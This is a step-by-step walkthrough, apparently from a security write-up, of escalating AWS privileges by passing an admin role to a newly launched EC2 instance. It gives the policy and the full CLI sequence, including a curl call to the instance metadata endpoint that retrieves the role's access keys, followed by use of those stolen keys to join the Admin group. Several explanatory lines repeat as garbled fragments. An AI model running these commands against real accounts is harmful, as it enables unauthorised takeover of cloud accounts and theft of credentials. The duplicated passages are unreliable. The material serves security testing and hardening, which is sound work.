Description

The iam:PassRole permission allows a user to pass a role to another AWS resource.

The ec2:RunInstances permission allows a user to run EC2 instances. With these two permissions, the user can create a new EC2 instance which they have SSH access to, pass a role to the instance with permissions that the user does not have currently, log into the instance, and request AWS keys for the role.

Requirements

The user needs to be able to pass a role to the instance with permissions that the user does not currently have.

The role needs to allow ec2.amazonaws.com to assume it.

to assume it. The user needs to have some way to SSH into the newly created instance. In the example below, the user assigns a public SSH key stored in AWS to the instance and the user has access to the matching private key.



Example

In this example, the user is part of a single group. The group has only a single policy applied to it. The policy provides the user with the

iam:PassRole permission, as well as the ability to list and run instances:

{ "Version": "2012-10-17", "Statement": [ { "Sid": "VisualEditor0", "Effect": "Allow", "Action": [ "iam:PassRole", "ec2:DescribeInstances", "ec2:RunInstances" ], "Resource": "*" } ] }



The user is not currently able to add their user account to the Admin group:

→ aws iam add-user-to-group --group-name Admin --user-name privesc_test --profile privesc

An error occurred (AccessDenied) when calling the AddUserToGroup operation: User: arn:aws:iam::[REDACTED]:user/privesc_test is not authorized to perform: iam:AddUserToGroup on resource: group Admin



First, the user creates a new instance using the following command:

→ aws ec2 run-instances --image-id ami-0de53d8956e8dcf80 --instance-type t2.micro --iam-instance-profile Name=adminaccess --key-name "Public" --security-group-ids sg-ca4a1fb8 --profile privesc --region us-east-1





This command includes the following switches:

image-id specifies the AWS Machine Image (AMI) to use. The image-id used here is for an Amazon Linux VM. AWS regularly changes their AMIs, so make sure to use a current value for the image-id .

specifies the AWS Machine Image (AMI) to use. The used here is for an Amazon Linux VM. AWS regularly changes their AMIs, so make sure to use a current value for the . instance-type specifies the type of instance to create. In this case, it’s a free-tier eligible instance.

specifies the type of instance to create. In this case, it’s a free-tier eligible instance. iam-instance-profile is the role to assign to the EC2 instance. This refers to an IAM role by name, in this case, adminaccess . This role provides administrative access to AWS.

is the role to assign to the EC2 instance. This refers to an IAM role by name, in this case, . This role provides administrative access to AWS. key-name refers to a stored SSH key pair by name.

refers to a stored SSH key pair by name. security-group-ids specifies one or more security groups that will to apply to the instance. The security group applied in this example provides only SSH access.

specifies one or more security groups that will to apply to the instance. The security group applied in this example provides only SSH access. region refers to the region where the instance should be created.



The result of this command is very long and not shown here to save space. The output provides information on the instance that was just created, and most importantly, the instance ID. The newly created instance will be in the “pending” state for a couple of minutes until provisioning is complete. The user can request information about the instance with the following command, replacing instance-id with the appropriate instance ID:

→ aws ec2 describe-instances --instance-id i-03aba12967c0cb73a --profile privesc --region us-east-1



Again, the output will be very long and not shown here. However, once provisioning is complete, the “state” of the instance will change to “running” and it should obtain a public IP address. At this point, the attacker can SSH into the instance, provided that they have the private SSH key that belongs to the “Public” key pair. After gaining access to the instance, the user can then request AWS keys for the adminaccess role through the metadata IP address:

→ ssh ec2-user@3.84.235.112 -i ~/.ssh/id_rsa

Warning: Permanently added ‘3.84.235.112’ (RSA) to the list of known hosts. X11 forwarding request failed on channel 0 __| __|_ ) _| ( / Amazon Linux 2 AMI ___|\___|___| https://aws.amazon.com/amazon-linux-2/ [ec2-user@ip-172-31-57-71 ~]$ curl http://169.254.169.254/ latest/meta-data/iam/securitycredentials/adminaccess { "Code" : "Success", "LastUpdated" : "2019-03-15T22:47:58Z", "Type" : "AWS-HMAC", "AccessKeyId" : "[REDACTED]", "SecretAccessKey" : "[REDACTED]", "Token" : "[REDACTED]", "Expiration" : "2019-03-16T05:22:37Z" }



The user can now use the AWS keys and its associated token to make AWS API calls under the adminaccess role. The commands below show the user adding themselves to the Admin group:

→ aws iam add-user-to-group --group-name Admin --user-name privesc_test --profile stolen-keys

→ aws iam list-groups-for-user --user-name privesc_test --profile privesc